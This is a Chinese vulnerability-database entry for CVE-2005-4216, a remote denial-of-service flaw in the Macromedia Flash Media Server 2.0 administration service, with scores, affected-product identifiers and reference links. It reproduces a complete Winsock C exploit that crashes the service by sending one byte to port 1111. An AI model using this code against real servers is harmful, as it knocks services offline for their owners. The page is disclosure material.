CVE-2005-4216
CVSS7.8
发布时间 :2005-12-14 06:03:00
修订时间 :2011-03-07 21:27:51
NMCOE    

[原文]The Administration Service (FMSAdmin.exe) in Macromedia Flash Media Server 2.0 r1145 allows remote attackers to cause a denial of service (application crash) via a malformed request with a single character to port 1111.


[CNNVD]Macromedia Flash媒体服务器管理服务远程拒绝服务漏洞(CNNVD-200512-286)

        Macromedia Flash媒体服务器将传统的流媒体功能与灵活的开发环境结合起来,可创建和提供创新的交互式媒体应用。
        Flash媒体服务器处理管理端口的流量时存在漏洞,远程攻击者可能利用此漏洞对服务器进行拒绝服务攻击。Flash媒体服务器使用1111端口进行远程服务器管理。远程攻击者可以利用该端口上的通讯处理错误,通过发送单个字符导致管理服务崩溃。
        

- CVSS (基础分值)

CVSS分值: 7.8 [严重(HIGH)]
机密性影响: NONE [对系统的机密性无影响]
完整性影响: NONE [不会对系统完整性产生影响]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:macromedia:flash_media_server:2.0_r1145Macromedia Flash Media Server 2.0 r1145
cpe:/a:macromedia:flash_media_server:2.0::professional
cpe:/a:macromedia:flash_media_server:2.0::edge
cpe:/a:macromedia:flash_media_server:2.0::origin
cpe:/a:macromedia:flash_media_server:2.0::developer

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-4216
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-4216
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200512-286
(官方数据源) CNNVD

- 其它链接及资源

http://www.vupen.com/english/advisories/2005/2865
(UNKNOWN)  VUPEN  ADV-2005-2865
http://www.securityfocus.com/bid/15822
(UNKNOWN)  BID  15822
http://www.ipomonis.com/advisories/Flash_media_server_2.txt
(VENDOR_ADVISORY)  MISC  http://www.ipomonis.com/advisories/Flash_media_server_2.txt
http://securitytracker.com/id?1015346
(UNKNOWN)  SECTRACK  1015346
http://secunia.com/advisories/17978
(VENDOR_ADVISORY)  SECUNIA  17978
http://xforce.iss.net/xforce/xfdb/23563
(UNKNOWN)  XF  macromedia-fmsadmin-dos(23563)
http://www.macromedia.com/devnet/security/security_zone/mpsb05-11.html
(UNKNOWN)  CONFIRM  http://www.macromedia.com/devnet/security/security_zone/mpsb05-11.html

- 漏洞信息

Macromedia Flash媒体服务器管理服务远程拒绝服务漏洞
高危 其他
2005-12-14 00:00:00 2005-12-14 00:00:00
远程  
        Macromedia Flash媒体服务器将传统的流媒体功能与灵活的开发环境结合起来,可创建和提供创新的交互式媒体应用。
        Flash媒体服务器处理管理端口的流量时存在漏洞,远程攻击者可能利用此漏洞对服务器进行拒绝服务攻击。Flash媒体服务器使用1111端口进行远程服务器管理。远程攻击者可以利用该端口上的通讯处理错误,通过发送单个字符导致管理服务崩溃。
        

- 公告与补丁

        

- 漏洞信息 (1371)

Macromedia Flash Media Server 2 Remote Denial of Service Exploit (EDBID:1371)
windows dos
2005-12-14 Verified
0 Kozan
N/A [点击下载]
/*****************************************************************

Macromedia Flash Media Server 2 Remote D.o.S Exploit by Kozan

Application: Macromedia Flash Media Server
http://www.macromedia.com/software/flashmediaserver/
Vendor: Macromedia

Discovered by:  dr_insane
Exploit Coded by: Kozan
Credits to ATmaCA,  dr_insane
Web: www.spyinstructors.com
Mail: kozan@spyinstructors.com

*****************************************************************/

#include <winsock2.h>
#include <stdio.h>
#include <windows.h>

#pragma comment(lib,"ws2_32.lib")

int nDefaultPort = 1111;

char SingleDoSChar[] = "\x41";

int main(int argc, char *argv[])
{
       fprintf(stdout, "\n\nMacromedia Flash Media Server 2 Remote D.o.S Exploit by Kozan\n");
       fprintf(stdout, "Bug Discovered by:  dr_insane\n");
       fprintf(stdout, "Exploit Coded by: Kozan\n");
       fprintf(stdout, "Credits to ATmaCA,  dr_insane\n");
       fprintf(stdout, "www.spyinstructors.com - kozan@spyinstructors.com\n\n");

       if(argc<2)
       {
               fprintf(stderr, "Usage: %s [Target IP]\n\n", argv[0]);
               return -1;
       }
       WSADATA wsaData;
       SOCKET sock;

       if( WSAStartup(0x0101,&wsaData) < 0 )
       {
               fprintf(stderr, "Winsock error!\n");
               return -1;
       }

       sock = socket(AF_INET,SOCK_STREAM,0);
       if( sock == -1 )
       {
               fprintf(stderr, "Socket error!\n");
               return -1;
       }

       struct sockaddr_in addr;

       addr.sin_family = AF_INET;
       addr.sin_port = htons(nDefaultPort);
       addr.sin_addr.s_addr = inet_addr(argv[1]);
       memset(&(addr.sin_zero), '\0', 8);

       fprintf(stdout, "Please wait while connecting to server...\n");

       if( connect( sock, (struct sockaddr*)&addr, sizeof(struct sockaddr) ) == -1 )
       {
               fprintf(stderr, "Connection failed!\n");
               closesocket(sock);
               return -1;
       }

       fprintf(stdout, "Please wait while sending single DoS char...\n");

       if( send(sock,SingleDoSChar,lstrlen(SingleDoSChar),0) == -1 )
       {
               fprintf(stderr, "DoS char could not sent!\n");
               closesocket(sock);
               return -1;
       }

       fprintf(stdout, "Operation completed...\n");
       closesocket(sock);
       WSACleanup();

       return 0;
}

// milw0rm.com [2005-12-14]
		

- 漏洞信息

21764
Macromedia Flash Media Server Administration Service Crafted Packet Remote DoS
Remote / Network Access Denial of Service
Loss of Availability
Exploit Public

- 漏洞描述

Unknown or Incomplete

- 时间线

2005-12-07 Unknow
2005-12-15 Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站